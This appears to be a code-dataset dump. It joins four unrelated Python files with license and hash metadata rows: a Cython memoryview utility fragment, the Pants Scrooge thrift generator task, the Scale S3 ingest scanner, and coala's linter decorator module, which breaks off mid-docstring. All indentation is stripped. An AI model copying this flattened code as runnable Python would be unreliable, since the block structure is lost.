if isinstance(spec, NameNode):
return _resolve_NameNode(env, spec)
elif isinstance(spec, AttributeNode):
return _resolve_AttributeNode(env, spec)
else:
raise CompileError(spec.pos, INVALID_ERR)
def _resolve_NameNode(env, node):
try:
resolved_name = env.lookup(node.name).name
except AttributeError:
raise CompileError(node.pos, INVALID_ERR)
viewscope = env.global_scope().context.cython_scope.viewscope
entry = viewscope.lookup(resolved_name)
if entry is None:
raise CompileError(node.pos, NOT_CIMPORTED_ERR)
return entry
def _resolve_AttributeNode(env, node):
path = []
while isinstance(node, AttributeNode):
path.insert(0, node.attribute)
node = node.obj
if isinstance(node, NameNode):
path.insert(0, node.name)
else:
raise CompileError(node.pos, EXPR_ERR)
modnames = path[:-1]
# must be at least 1 module name, o/w not an AttributeNode.
assert modnames
scope = env
for modname in modnames:
mod = scope.lookup(modname)
if not mod or not mod.as_module:
raise CompileError(
node.pos, "undeclared name not builtin: %s" % modname)
scope = mod.as_module
entry = scope.lookup(path[-1])
if not entry:
raise CompileError(node.pos, "No such attribute '%s'" % path[-1])
return entry
#
### Utility loading
#
def load_memview_cy_utility(util_code_name, context=None, **kwargs):
return CythonUtilityCode.load(util_code_name, "MemoryView.pyx",
context=context, **kwargs)
def load_memview_c_utility(util_code_name, context=None, **kwargs):
if context is None:
return UtilityCode.load(util_code_name, "MemoryView_C.c", **kwargs)
else:
return TempitaUtilityCode.load(util_code_name, "MemoryView_C.c",
context=context, **kwargs)
def use_cython_array_utility_code(env):
cython_scope = env.global_scope().context.cython_scope
cython_scope.load_cythonscope()
cython_scope.viewscope.lookup('array_cwrapper').used = True
context = {
'memview_struct_name': memview_objstruct_cname,
'max_dims': Options.buffer_max_dims,
'memviewslice_name': memviewslice_cname,
'memslice_init': memslice_entry_init,
}
memviewslice_declare_code = load_memview_c_utility(
"MemviewSliceStruct",
proto_block='utility_code_proto_before_types',
context=context)
atomic_utility = load_memview_c_utility("Atomics", context,
proto_block='utility_code_proto_before_types')
memviewslice_init_code = load_memview_c_utility(
"MemviewSliceInit",
context=dict(context, BUF_MAX_NDIMS=Options.buffer_max_dims),
requires=[memviewslice_declare_code,
Buffer.acquire_utility_code,
atomic_utility,
Buffer.typeinfo_compare_code],
)
memviewslice_index_helpers = load_memview_c_utility("MemviewSliceIndex")
typeinfo_to_format_code = load_memview_cy_utility(
"BufferFormatFromTypeInfo", requires=[Buffer._typeinfo_to_format_code])
is_contig_utility = load_memview_c_utility("MemviewSliceIsContig", context)
overlapping_utility = load_memview_c_utility("OverlappingSlices", context)
copy_contents_new_utility = load_memview_c_utility(
"MemviewSliceCopyTemplate",
context,
requires=[], # require cython_array_utility_code
)
view_utility_code = load_memview_cy_utility(
"View.MemoryView",
context=context,
requires=[Buffer.GetAndReleaseBufferUtilityCode(),
Buffer.buffer_struct_declare_code,
Buffer.empty_bufstruct_utility,
memviewslice_init_code,
is_contig_utility,
overlapping_utility,
copy_contents_new_utility,
ModuleNode.capsule_utility_code],
)
view_utility_whitelist = ('array', 'memoryview', 'array_cwrapper',
'generic', 'strided', 'indirect', 'contiguous',
'indirect_contiguous')
copy_contents_new_utility.requires.append(view_utility_code) | apache-2.0 | 9,080,627,596,111,706,000 | 34.598501 | 108 | 0.573749 | false |
tejal29/pants | contrib/scrooge/src/python/pants/contrib/scrooge/tasks/scrooge_gen.py | 1 | 14183 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import hashlib
import os
import re
import tempfile
from collections import defaultdict, namedtuple
from pants.backend.codegen.targets.java_thrift_library import JavaThriftLibrary
from pants.backend.jvm.targets.java_library import JavaLibrary
from pants.backend.jvm.targets.scala_library import ScalaLibrary
from pants.backend.jvm.tasks.jvm_tool_task_mixin import JvmToolTaskMixin
from pants.backend.jvm.tasks.nailgun_task import NailgunTask
from pants.base.address import SyntheticAddress
from pants.base.address_lookup_error import AddressLookupError
from pants.base.build_environment import get_buildroot
from pants.base.exceptions import TaskError
from pants.thrift_util import calculate_compile_sources
from pants.util.dirutil import safe_mkdir, safe_open
from twitter.common.collections import OrderedSet
_CONFIG_SECTION = 'scrooge-gen'
_TARGET_TYPE_FOR_LANG = dict(scala=ScalaLibrary, java=JavaLibrary)
class ScroogeGen(NailgunTask, JvmToolTaskMixin):
GenInfo = namedtuple('GenInfo', ['gen', 'deps'])
class DepLookupError(AddressLookupError):
"""Thrown when a dependency can't be found."""
pass
class PartialCmd(namedtuple('PC', ['language', 'rpc_style', 'namespace_map'])):
@property
def relative_outdir(self):
namespace_sig = None
if self.namespace_map:
sha = hashlib.sha1()
for ns_from, ns_to in sorted(self.namespace_map):
sha.update(ns_from)
sha.update(ns_to)
namespace_sig = sha.hexdigest()
output_style = '-'.join(filter(None, (self.language, self.rpc_style, namespace_sig)))
return output_style
@classmethod
def register_options(cls, register):
super(ScroogeGen, cls).register_options(register)
register('--verbose', default=False, action='store_true', help='Emit verbose output.')
cls.register_jvm_tool(register, 'scrooge-gen')
@classmethod
def product_types(cls):
return ['java', 'scala']
def __init__(self, *args, **kwargs):
super(ScroogeGen, self).__init__(*args, **kwargs)
self.defaults = JavaThriftLibrary.Defaults(self.context.config)
@property
def config_section(self):
return _CONFIG_SECTION
# TODO(benjy): Use regular os-located tmpfiles, as we do everywhere else.
def _tempname(self):
# don't assume the user's cwd is buildroot
pants_workdir = self.get_options().pants_workdir
tmp_dir = os.path.join(pants_workdir, 'tmp')
safe_mkdir(tmp_dir)
fd, path = tempfile.mkstemp(dir=tmp_dir, prefix='')
os.close(fd)
return path
def _outdir(self, partial_cmd):
return os.path.join(self.workdir, partial_cmd.relative_outdir)
def execute(self):
targets = self.context.targets()
self._validate_compiler_configs(targets)
gentargets_by_dependee = self.context.dependents(
on_predicate=self.is_gentarget,
from_predicate=lambda t: not self.is_gentarget(t))
dependees_by_gentarget = defaultdict(set)
for dependee, tgts in gentargets_by_dependee.items():
for gentarget in tgts:
dependees_by_gentarget[gentarget].add(dependee)
partial_cmds = defaultdict(set)
gentargets = filter(self.is_gentarget, targets)
for target in gentargets:
language = self.defaults.get_language(target)
rpc_style = self.defaults.get_rpc_style(target)
partial_cmd = self.PartialCmd(
language=language,
rpc_style=rpc_style,
namespace_map=tuple(sorted(target.namespace_map.items()) if target.namespace_map else ()))
partial_cmds[partial_cmd].add(target)
for partial_cmd, tgts in partial_cmds.items():
gen_files_for_source = self.gen(partial_cmd, tgts)
relative_outdir = os.path.relpath(self._outdir(partial_cmd), get_buildroot())
langtarget_by_gentarget = {}
for target in tgts:
dependees = dependees_by_gentarget.get(target, [])
langtarget_by_gentarget[target] = self.createtarget(target, dependees, relative_outdir,
gen_files_for_source)
genmap = self.context.products.get(partial_cmd.language)
for gentarget, langtarget in langtarget_by_gentarget.items():
genmap.add(gentarget, get_buildroot(), [langtarget])
for dep in gentarget.dependencies:
if self.is_gentarget(dep):
langtarget.inject_dependency(langtarget_by_gentarget[dep].address)
def gen(self, partial_cmd, targets):
with self.invalidated(targets, invalidate_dependents=True) as invalidation_check:
invalid_targets = []
for vt in invalidation_check.invalid_vts:
invalid_targets.extend(vt.targets)
import_paths, changed_srcs = calculate_compile_sources(invalid_targets, self.is_gentarget)
outdir = self._outdir(partial_cmd)
if changed_srcs:
args = []
for import_path in import_paths:
args.extend(['--import-path', import_path])
args.extend(['--language', partial_cmd.language])
for lhs, rhs in partial_cmd.namespace_map:
args.extend(['--namespace-map', '%s=%s' % (lhs, rhs)])
if partial_cmd.rpc_style == 'ostrich':
args.append('--finagle')
args.append('--ostrich')
elif partial_cmd.rpc_style == 'finagle':
args.append('--finagle')
args.extend(['--dest', outdir])
safe_mkdir(outdir)
if not self.context.config.getbool(_CONFIG_SECTION, 'strict', default=False):
args.append('--disable-strict')
if self.get_options().verbose:
args.append('--verbose')
gen_file_map_path = os.path.relpath(self._tempname())
args.extend(['--gen-file-map', gen_file_map_path])
args.extend(changed_srcs)
classpath = self.tool_classpath('scrooge-gen')
jvm_options = self.context.config.getlist(_CONFIG_SECTION, 'jvm_options', default=[])
jvm_options.append('-Dfile.encoding=UTF-8')
returncode = self.runjava(classpath=classpath,
main='com.twitter.scrooge.Main',
jvm_options=jvm_options,
args=args,
workunit_name='scrooge-gen')
try:
if 0 == returncode:
gen_files_for_source = self.parse_gen_file_map(gen_file_map_path, outdir)
else:
gen_files_for_source = None
finally:
os.remove(gen_file_map_path)
if 0 != returncode:
raise TaskError('Scrooge compiler exited non-zero ({0})'.format(returncode))
self.write_gen_file_map(gen_files_for_source, invalid_targets, outdir)
return self.gen_file_map(targets, outdir)
def createtarget(self, gentarget, dependees, outdir, gen_files_for_source):
assert self.is_gentarget(gentarget)
def create_target(files, deps, target_type):
spec = '{spec_path}:{name}'.format(spec_path=outdir, name=gentarget.id)
address = SyntheticAddress.parse(spec=spec)
return self.context.add_new_target(address,
target_type,
sources=files,
provides=gentarget.provides,
dependencies=deps,
excludes=gentarget.excludes,
derived_from=gentarget)
def create_geninfo(key):
gen_info = self.context.config.getdict(_CONFIG_SECTION, key,
default={'gen': key,
'deps': {'service': [], 'structs': []}})
gen = gen_info['gen']
deps = dict()
for category, depspecs in gen_info['deps'].items():
dependencies = OrderedSet()
deps[category] = dependencies
for depspec in depspecs:
try:
dependencies.update(self.context.resolve(depspec))
except AddressLookupError as e:
raise self.DepLookupError("{message}\n referenced from [{section}] key: " \
"gen->deps->{category} in pants.ini".format(
message=e,
section=_CONFIG_SECTION,
category=category
))
return self.GenInfo(gen, deps)
return self._inject_target(gentarget, dependees,
create_geninfo(self.defaults.get_language(gentarget)),
gen_files_for_source,
create_target)
def _inject_target(self, target, dependees, geninfo, gen_files_for_source, create_target):
files = []
has_service = False
for source in target.sources_relative_to_buildroot():
services = calculate_services(source)
genfiles = gen_files_for_source[source]
has_service = has_service or services
files.extend(genfiles)
deps = OrderedSet(geninfo.deps['service' if has_service else 'structs'])
deps.update(target.dependencies)
target_type = _TARGET_TYPE_FOR_LANG[self.defaults.get_language(target)]
tgt = create_target(files, deps, target_type)
tgt.add_labels('codegen')
for dependee in dependees:
dependee.inject_dependency(tgt.address)
return tgt
def parse_gen_file_map(self, gen_file_map_path, outdir):
d = defaultdict(set)
with safe_open(gen_file_map_path, 'r') as deps:
for dep in deps:
src, cls = dep.strip().split('->')
src = os.path.relpath(src.strip())
cls = os.path.relpath(cls.strip(), outdir)
d[src].add(cls)
return d
def gen_file_map_path_for_target(self, target, outdir):
return os.path.join(outdir, 'gen-file-map-by-target', target.id)
def gen_file_map_for_target(self, target, outdir):
gen_file_map = self.gen_file_map_path_for_target(target, outdir)
return self.parse_gen_file_map(gen_file_map, outdir)
def gen_file_map(self, targets, outdir):
gen_file_map = defaultdict(set)
for target in targets:
target_gen_file_map = self.gen_file_map_for_target(target, outdir)
gen_file_map.update(target_gen_file_map)
return gen_file_map
def write_gen_file_map_for_target(self, gen_file_map, target, outdir):
def calc_srcs(target):
_, srcs = calculate_compile_sources([target], self.is_gentarget)
return srcs
with safe_open(self.gen_file_map_path_for_target(target, outdir), 'w') as f:
for src in sorted(calc_srcs(target)):
clss = gen_file_map[src]
for cls in sorted(clss):
print('%s -> %s' % (src, os.path.join(outdir, cls)), file=f)
def write_gen_file_map(self, gen_file_map, targets, outdir):
for target in targets:
self.write_gen_file_map_for_target(gen_file_map, target, outdir)
def is_gentarget(self, target):
if not isinstance(target, JavaThriftLibrary):
return False
# We only handle requests for 'scrooge' compilation and not, for example 'thrift', aka the
# Apache thrift compiler
compiler = self.defaults.get_compiler(target)
if compiler != 'scrooge':
return False
language = self.defaults.get_language(target)
if language not in ('scala', 'java'):
raise TaskError('Scrooge can not generate {0}'.format(language))
return True
def _validate_compiler_configs(self, targets):
self._validate(self.defaults, targets)
@staticmethod
def _validate(defaults, targets):
ValidateCompilerConfig = namedtuple('ValidateCompilerConfig', ['language', 'rpc_style'])
def compiler_config(tgt):
# Note compiler is not present in this signature. At this time
# Scrooge and the Apache thrift generators produce identical
# java sources, and the Apache generator does not produce scala
# sources. As there's no permutation allowing the creation of
# incompatible sources with the same language+rpc_style we omit
# the compiler from the signature at this time.
return ValidateCompilerConfig(language=defaults.get_language(tgt),
rpc_style=defaults.get_rpc_style(tgt))
mismatched_compiler_configs = defaultdict(set)
for target in filter(lambda t: isinstance(t, JavaThriftLibrary), targets):
mycompilerconfig = compiler_config(target)
def collect(dep):
if mycompilerconfig != compiler_config(dep):
mismatched_compiler_configs[target].add(dep)
target.walk(collect, predicate=lambda t: isinstance(t, JavaThriftLibrary))
if mismatched_compiler_configs:
msg = ['Thrift dependency trees must be generated with a uniform compiler configuration.\n\n']
for tgt in sorted(mismatched_compiler_configs.keys()):
msg.append('%s - %s\n' % (tgt, compiler_config(tgt)))
for dep in mismatched_compiler_configs[tgt]:
msg.append(' %s - %s\n' % (dep, compiler_config(dep)))
raise TaskError(''.join(msg))
NAMESPACE_PARSER = re.compile(r'^\s*namespace\s+([^\s]+)\s+([^\s]+)\s*$')
TYPE_PARSER = re.compile(r'^\s*(const|enum|exception|service|struct|union)\s+([^\s{]+).*')
# TODO(John Sirois): consolidate thrift parsing to 1 pass instead of 2
def calculate_services(source):
"""Calculates the services generated for the given thrift IDL source.
Returns an interable of services
"""
with open(source, 'r') as thrift:
namespaces = dict()
types = defaultdict(set)
for line in thrift:
match = NAMESPACE_PARSER.match(line)
if match:
lang = match.group(1)
namespace = match.group(2)
namespaces[lang] = namespace
else:
match = TYPE_PARSER.match(line)
if match:
typename = match.group(1)
name = match.group(2)
types[typename].add(name)
return types['service']
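# Illustrative input/output for the helper above (a hypothetical IDL snippet):
#
#   namespace java com.example.thrift
#   struct Point { 1: i32 x, 2: i32 y }
#   service Geometry { Point translate(1: Point p) }
#
# calculate_services() on such a file would return a set containing
# 'Geometry'; the namespace and struct lines only populate the intermediate
# maps and are not part of the result.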
| apache-2.0 | -4,411,980,448,864,853,000 | 38.506964 | 100 | 0.636043 | false |
ngageoint/scale | scale/ingest/scan/scanners/s3_scanner.py | 1 | 1707 | """Defines a scanner that scans an S3 bucket backed workspace for files"""
from __future__ import unicode_literals
import logging
from ingest.scan.scanners.scanner import Scanner
logger = logging.getLogger(__name__)
class S3Scanner(Scanner):
"""A scanner for an S3 bucket backed workspace
"""
def __init__(self):
"""Constructor
"""
super(S3Scanner, self).__init__('s3', ['s3'])
def load_configuration(self, configuration):
"""See :meth:`ingest.scan.scanners.scanner.Scanner.load_configuration`
"""
# Nothing to do as all configuration is done at workspace broker level.
pass
def validate_configuration(self, configuration):
"""See :meth:`ingest.scan.scanners.scanner.Scanner.validate_configuration`
"""
# No configuration is required for S3 scanner as everything is provided
# by way of the workspace configurations.
return []
def _ingest_file(self, file_name, file_size):
"""Initiates ingest for a single S3 object
:param file_name: S3 object key
:type file_name: string
:param file_size: object size in bytes
:type file_size: int
:returns: Ingest model prepped for bulk create
:rtype: :class:`ingest.models.Ingest`
"""
ingest = None
if self._dry_run:
logger.info("Scan detected S3 object in workspace '%s': %s" % (self._scanned_workspace.name, file_name))
else:
ingest = self._process_ingest(file_name, file_size)
logger.info("Scan processed S3 object from workspace '%s': %s" % (self._scanned_workspace.name, file_name))
return ingest
| apache-2.0 | -7,532,263,870,549,302,000 | 29.482143 | 119 | 0.630346 | false |
tushar-rishav/coala | coalib/bearlib/abstractions/Linter.py | 1 | 31941 | from contextlib import contextmanager
from functools import partial
import inspect
from itertools import chain, compress
import re
import shutil
from subprocess import check_call, CalledProcessError, DEVNULL
from types import MappingProxyType
from coalib.bears.LocalBear import LocalBear
from coalib.misc.ContextManagers import make_temp
from coala_utils.decorators import assert_right_type, enforce_signature
from coalib.misc.Future import partialmethod
from coalib.misc.Shell import run_shell_command
from coalib.results.Diff import Diff
from coalib.results.Result import Result
from coalib.results.RESULT_SEVERITY import RESULT_SEVERITY
from coalib.settings.FunctionMetadata import FunctionMetadata
def _prepare_options(options):
"""
Prepares options for ``linter`` for a given options dict in-place.
:param options:
The options dict that contains user/developer inputs.
"""
allowed_options = {"executable",
"output_format",
"use_stdin",
"use_stdout",
"use_stderr",
"config_suffix",
"executable_check_fail_info",
"prerequisite_check_command"}
if not options["use_stdout"] and not options["use_stderr"]:
raise ValueError("No output streams provided at all.")
if options["output_format"] == "corrected":
if (
"diff_severity" in options and
options["diff_severity"] not in RESULT_SEVERITY.reverse):
raise TypeError("Invalid value for `diff_severity`: " +
repr(options["diff_severity"]))
if "result_message" in options:
assert_right_type(options["result_message"], str, "result_message")
if "diff_distance" in options:
assert_right_type(options["diff_distance"], int, "diff_distance")
allowed_options |= {"diff_severity", "result_message", "diff_distance"}
elif options["output_format"] == "regex":
if "output_regex" not in options:
raise ValueError("`output_regex` needed when specified "
"output-format 'regex'.")
options["output_regex"] = re.compile(options["output_regex"])
        # No default severity_map is set up here; one is only processed when
        # the user provides it. If one is manually provided but the named
        # group `severity` is not used in the output_regex, throw an exception.
if "severity_map" in options:
if "severity" not in options["output_regex"].groupindex:
raise ValueError("Provided `severity_map` but named group "
"`severity` is not used in `output_regex`.")
assert_right_type(options["severity_map"], dict, "severity_map")
for key, value in options["severity_map"].items():
assert_right_type(key, str, "severity_map key")
try:
assert_right_type(value, int, "<severity_map dict-value>")
except TypeError:
                    raise TypeError(
                        "The value {!r} for key {!r} inside given "
                        "severity-map is not a valid severity value.".format(
value, key))
if value not in RESULT_SEVERITY.reverse:
raise TypeError(
"Invalid severity value {!r} for key {!r} inside "
"given severity-map.".format(value, key))
# Auto-convert keys to lower-case. This creates automatically a new
# dict which prevents runtime-modifications.
options["severity_map"] = {
key.lower(): value
for key, value in options["severity_map"].items()}
if "result_message" in options:
assert_right_type(options["result_message"], str, "result_message")
allowed_options |= {"output_regex", "severity_map", "result_message"}
elif options["output_format"] is not None:
raise ValueError("Invalid `output_format` specified.")
if options["prerequisite_check_command"]:
if "prerequisite_check_fail_message" in options:
assert_right_type(options["prerequisite_check_fail_message"],
str,
"prerequisite_check_fail_message")
else:
options["prerequisite_check_fail_message"] = (
"Prerequisite check failed.")
allowed_options.add("prerequisite_check_fail_message")
# Check for illegal superfluous options.
superfluous_options = options.keys() - allowed_options
if superfluous_options:
raise ValueError(
"Invalid keyword arguments provided: " +
", ".join(repr(s) for s in sorted(superfluous_options)))
def _create_linter(klass, options):
class LinterMeta(type):
def __repr__(cls):
return "<{} linter class (wrapping {!r})>".format(
cls.__name__, options["executable"])
class LinterBase(LocalBear, metaclass=LinterMeta):
@staticmethod
def generate_config(filename, file):
"""
Generates the content of a config-file the linter-tool might need.
The contents generated from this function are written to a
temporary file and the path is provided inside
``create_arguments()``.
By default no configuration is generated.
You can provide additional keyword arguments and defaults. These
will be interpreted as required settings that need to be provided
through a coafile-section.
:param filename:
The name of the file currently processed.
:param file:
The contents of the file currently processed.
:return:
The config-file-contents as a string or ``None``.
"""
return None
@staticmethod
def create_arguments(filename, file, config_file):
"""
Creates the arguments for the linter.
You can provide additional keyword arguments and defaults. These
will be interpreted as required settings that need to be provided
through a coafile-section.
:param filename:
The name of the file the linter-tool shall process.
:param file:
The contents of the file.
:param config_file:
The path of the config-file if used. ``None`` if unused.
:return:
A sequence of arguments to feed the linter-tool with.
"""
raise NotImplementedError
@staticmethod
def get_executable():
"""
Returns the executable of this class.
:return:
The executable name.
"""
return options["executable"]
@classmethod
def check_prerequisites(cls):
"""
Checks whether the linter-tool the bear uses is operational.
:return:
True if operational, otherwise a string containing more info.
"""
if shutil.which(cls.get_executable()) is None:
return (repr(cls.get_executable()) + " is not installed." +
(" " + options["executable_check_fail_info"]
if options["executable_check_fail_info"] else
""))
else:
if options["prerequisite_check_command"]:
try:
check_call(options["prerequisite_check_command"],
stdout=DEVNULL,
stderr=DEVNULL)
return True
except (OSError, CalledProcessError):
return options["prerequisite_check_fail_message"]
return True
@classmethod
def _get_create_arguments_metadata(cls):
return FunctionMetadata.from_function(
cls.create_arguments,
omit={"self", "filename", "file", "config_file"})
@classmethod
def _get_generate_config_metadata(cls):
return FunctionMetadata.from_function(
cls.generate_config,
omit={"filename", "file"})
@classmethod
def _get_process_output_metadata(cls):
metadata = FunctionMetadata.from_function(cls.process_output)
if options["output_format"] is None:
omitted = {"self", "output", "filename", "file"}
else:
# If a specific output format is provided, function signatures
# from process_output functions should not appear in the help.
omitted = set(chain(metadata.non_optional_params,
metadata.optional_params))
metadata.omit = omitted
return metadata
@classmethod
def get_metadata(cls):
merged_metadata = FunctionMetadata.merge(
cls._get_process_output_metadata(),
cls._get_generate_config_metadata(),
cls._get_create_arguments_metadata())
merged_metadata.desc = inspect.getdoc(cls)
return merged_metadata
def _convert_output_regex_match_to_result(self,
match,
filename,
severity_map,
result_message):
"""
Converts the matched named-groups of ``output_regex`` to an actual
``Result``.
:param match:
The regex match object.
:param filename:
The name of the file this match belongs to.
:param severity_map:
The dict to use to map the severity-match to an actual
``RESULT_SEVERITY``.
:param result_message:
The static message to use for results instead of grabbing it
from the executable output via the ``message`` named regex
group.
"""
            # Pre-process the groups
groups = match.groupdict()
if 'severity' in groups:
try:
groups["severity"] = severity_map[
groups["severity"].lower()]
except KeyError:
self.warn(
repr(groups["severity"]) + " not found in "
"severity-map. Assuming `RESULT_SEVERITY.NORMAL`.")
groups["severity"] = RESULT_SEVERITY.NORMAL
else:
groups['severity'] = RESULT_SEVERITY.NORMAL
for variable in ("line", "column", "end_line", "end_column"):
groups[variable] = (None
if groups.get(variable, None) is None else
int(groups[variable]))
if "origin" in groups:
groups["origin"] = "{} ({})".format(klass.__name__,
groups["origin"].strip())
# Construct the result.
return Result.from_values(
origin=groups.get("origin", self),
message=(groups.get("message", "").strip()
if result_message is None else result_message),
file=filename,
severity=groups["severity"],
line=groups["line"],
column=groups["column"],
end_line=groups["end_line"],
end_column=groups["end_column"],
additional_info=groups.get("additional_info", "").strip())
def process_output_corrected(self,
output,
filename,
file,
diff_severity=RESULT_SEVERITY.NORMAL,
result_message="Inconsistency found.",
diff_distance=1):
"""
Processes the executable's output as a corrected file.
:param output:
The output of the program. This can be either a single
string or a sequence of strings.
:param filename:
The filename of the file currently being corrected.
:param file:
The contents of the file currently being corrected.
:param diff_severity:
The severity to use for generating results.
:param result_message:
The message to use for generating results.
:param diff_distance:
Number of unchanged lines that are allowed in between two
                changed lines so they get yielded as one diff. If a negative
                distance is given, every change will be yielded as its own
                diff, even if they are right beneath each other.
:return:
An iterator returning results containing patches for the
file to correct.
"""
if isinstance(output, str):
output = (output,)
for string in output:
for diff in Diff.from_string_arrays(
file,
string.splitlines(keepends=True)).split_diff(
distance=diff_distance):
yield Result(self,
result_message,
affected_code=diff.affected_code(filename),
diffs={filename: diff},
severity=diff_severity)
def process_output_regex(
self, output, filename, file, output_regex,
severity_map=MappingProxyType({
"critical": RESULT_SEVERITY.MAJOR,
"c": RESULT_SEVERITY.MAJOR,
"fatal": RESULT_SEVERITY.MAJOR,
"fail": RESULT_SEVERITY.MAJOR,
"f": RESULT_SEVERITY.MAJOR,
"error": RESULT_SEVERITY.MAJOR,
"err": RESULT_SEVERITY.MAJOR,
"e": RESULT_SEVERITY.MAJOR,
"warning": RESULT_SEVERITY.NORMAL,
"warn": RESULT_SEVERITY.NORMAL,
"w": RESULT_SEVERITY.NORMAL,
"information": RESULT_SEVERITY.INFO,
"info": RESULT_SEVERITY.INFO,
"i": RESULT_SEVERITY.INFO,
"suggestion": RESULT_SEVERITY.INFO}),
result_message=None):
"""
Processes the executable's output using a regex.
:param output:
The output of the program. This can be either a single
string or a sequence of strings.
:param filename:
The filename of the file currently being corrected.
:param file:
The contents of the file currently being corrected.
:param output_regex:
The regex to parse the output with. It should use as many
of the following named groups (via ``(?P<name>...)``) to
provide a good result:
- line - The line where the issue starts.
- column - The column where the issue starts.
- end_line - The line where the issue ends.
- end_column - The column where the issue ends.
- severity - The severity of the issue.
- message - The message of the result.
- origin - The origin of the issue.
- additional_info - Additional info provided by the issue.
                The groups ``line``, ``column``, ``end_line`` and
                ``end_column`` don't have to match numbers only; they can
                also match nothing, in which case the generated ``Result``
                is automatically filled with ``None`` for the appropriate
                properties.
:param severity_map:
A dict used to map a severity string (captured from the
``output_regex`` with the named group ``severity``) to an
actual ``coalib.results.RESULT_SEVERITY`` for a result.
:param result_message:
The static message to use for results instead of grabbing it
from the executable output via the ``message`` named regex
group.
:return:
An iterator returning results.
"""
if isinstance(output, str):
output = (output,)
for string in output:
for match in re.finditer(output_regex, string):
yield self._convert_output_regex_match_to_result(
match, filename, severity_map=severity_map,
result_message=result_message)
if options["output_format"] is None:
# Check if user supplied a `process_output` override.
if not callable(getattr(klass, "process_output", None)):
raise ValueError("`process_output` not provided by given "
"class {!r}.".format(klass.__name__))
# No need to assign to `process_output` here, the class mixing
# below automatically does that.
else:
# Prevent people from accidentally defining `process_output`
# manually, as this would implicitly override the internally
# set-up `process_output`.
if hasattr(klass, "process_output"):
raise ValueError("Found `process_output` already defined "
"by class {!r}, but {!r} output-format is "
"specified.".format(klass.__name__,
options["output_format"]))
if options["output_format"] == "corrected":
process_output_args = {
key: options[key]
for key in ("result_message", "diff_severity",
"diff_distance")
if key in options}
process_output = partialmethod(
process_output_corrected, **process_output_args)
else:
assert options["output_format"] == "regex"
process_output_args = {
key: options[key]
for key in ("output_regex", "severity_map",
"result_message")
if key in options}
process_output = partialmethod(
process_output_regex, **process_output_args)
@classmethod
@contextmanager
def _create_config(cls, filename, file, **kwargs):
"""
Provides a context-manager that creates the config file if the
user provides one and cleans it up when done with linting.
:param filename:
The filename of the file.
:param file:
The file contents.
:param kwargs:
Section settings passed from ``run()``.
:return:
A context-manager handling the config-file.
"""
content = cls.generate_config(filename, file, **kwargs)
if content is None:
yield None
else:
with make_temp(
suffix=options["config_suffix"]) as config_file:
with open(config_file, mode="w") as fl:
fl.write(content)
yield config_file
def run(self, filename, file, **kwargs):
# Get the **kwargs params to forward to `generate_config()`
# (from `_create_config()`).
generate_config_kwargs = FunctionMetadata.filter_parameters(
self._get_generate_config_metadata(), kwargs)
with self._create_config(
filename,
file,
**generate_config_kwargs) as config_file:
# And now retrieve the **kwargs for `create_arguments()`.
create_arguments_kwargs = (
FunctionMetadata.filter_parameters(
self._get_create_arguments_metadata(), kwargs))
args = self.create_arguments(filename, file, config_file,
**create_arguments_kwargs)
try:
args = tuple(args)
except TypeError:
self.err("The given arguments "
"{!r} are not iterable.".format(args))
return
arguments = (self.get_executable(),) + args
self.debug("Running '{}'".format(' '.join(arguments)))
output = run_shell_command(
arguments,
stdin="".join(file) if options["use_stdin"] else None)
output = tuple(compress(
output,
(options["use_stdout"], options["use_stderr"])))
if len(output) == 1:
output = output[0]
process_output_kwargs = FunctionMetadata.filter_parameters(
self._get_process_output_metadata(), kwargs)
return self.process_output(output, filename, file,
**process_output_kwargs)
def __repr__(self):
return "<{} linter object (wrapping {!r}) at {}>".format(
type(self).__name__, self.get_executable(), hex(id(self)))
    # Mix the linter into the user-defined interface, otherwise
# `create_arguments` and other methods would be overridden by the
# default version.
result_klass = type(klass.__name__, (klass, LinterBase), {})
result_klass.__doc__ = klass.__doc__ if klass.__doc__ else ""
return result_klass
@enforce_signature
def linter(executable: str,
use_stdin: bool=False,
use_stdout: bool=True,
use_stderr: bool=False,
config_suffix: str="",
executable_check_fail_info: str="",
prerequisite_check_command: tuple=(),
output_format: (str, None)=None,
**options):
"""
Decorator that creates a ``LocalBear`` that is able to process results from
an external linter tool.
    The main functionality is achieved through the ``create_arguments()``
    function that constructs the command-line arguments that get passed to
    your executable.
>>> @linter("xlint", output_format="regex", output_regex="...")
... class XLintBear:
... @staticmethod
... def create_arguments(filename, file, config_file):
... return "--lint", filename
Requiring settings is possible like in ``Bear.run()`` with supplying
additional keyword arguments (and if needed with defaults).
>>> @linter("xlint", output_format="regex", output_regex="...")
... class XLintBear:
... @staticmethod
... def create_arguments(filename,
... file,
... config_file,
... lintmode: str,
... enable_aggressive_lints: bool=False):
... arguments = ("--lint", filename, "--mode=" + lintmode)
... if enable_aggressive_lints:
... arguments += ("--aggressive",)
... return arguments
Sometimes your tool requires an actual file that contains configuration.
``linter`` allows you to just define the contents the configuration shall
contain via ``generate_config()`` and handles everything else for you.
>>> @linter("xlint", output_format="regex", output_regex="...")
... class XLintBear:
... @staticmethod
... def generate_config(filename,
... file,
... lintmode,
... enable_aggressive_lints):
... modestring = ("aggressive"
... if enable_aggressive_lints else
... "non-aggressive")
... contents = ("<xlint>",
... " <mode>" + lintmode + "</mode>",
... " <aggressive>" + modestring + "</aggressive>",
... "</xlint>")
... return "\\n".join(contents)
...
... @staticmethod
... def create_arguments(filename,
... file,
... config_file):
... return "--lint", filename, "--config", config_file
As you can see you don't need to copy additional keyword-arguments you
introduced from ``create_arguments()`` to ``generate_config()`` and
vice-versa. ``linter`` takes care of forwarding the right arguments to the
right place, so you are able to avoid signature duplication.
    If you override ``process_output``, you have the same feature as above
(auto-forwarding of the right arguments defined in your function
signature).
    Note when overriding ``process_output``: Providing a single output stream
    (via ``use_stdout`` or ``use_stderr``) puts the corresponding string from
    that stream into the ``output`` parameter; providing both output streams
    passes a tuple ``(stdout, stderr)`` instead. Providing ``use_stdout=False``
    and ``use_stderr=False`` raises a ``ValueError``. By default ``use_stdout``
    is ``True`` and ``use_stderr`` is ``False``.
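    A minimal sketch of such an override might look like this (both ``xlint``
    and the way its output is handled here are, as in the examples above,
    purely illustrative):
    >>> from coalib.results.Result import Result
    >>> @linter("xlint")
    ... class XLintBear:
    ...     @staticmethod
    ...     def create_arguments(filename, file, config_file):
    ...         return "--lint", filename
    ...
    ...     def process_output(self, output, filename, file):
    ...         # Yield one result per non-empty output line.
    ...         for line in output.splitlines():
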